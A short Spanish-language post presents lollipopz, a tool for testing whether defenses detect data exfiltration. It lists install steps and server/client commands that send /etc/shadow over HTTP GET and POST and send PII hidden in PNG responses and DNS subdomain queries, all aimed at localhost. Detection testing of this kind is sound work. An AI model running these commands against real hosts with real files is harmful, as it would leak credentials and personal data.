lollipopz: utilidad para probar distintas técnicas de exfiltración de datos

Lollipoz es una simple pero útil herramienta para probar la detección de distintas técnicas para exfiltración de información, por supuesto siempre para tests legales ;)


Instalación

$ git clone https://github.com/tasooshi/lollipopz.git
$ cd lollipopz
$ pip install -r requirements.txt


/etc/shadow -> HTTP GET requests

Server

# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log

Client

$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

/etc/shadow -> HTTP POST requests

Server

# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTServer -lp 80 -o output.log

Client

$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

PII -> PNG embedded in HTTP Response

Server

$ ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Server -lp 37650 -o output.log

Client

# ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r

PII -> DNS subdomains querying

Server

# ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Server -lp 53 -o output.log

Client

$ ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r

Comentarios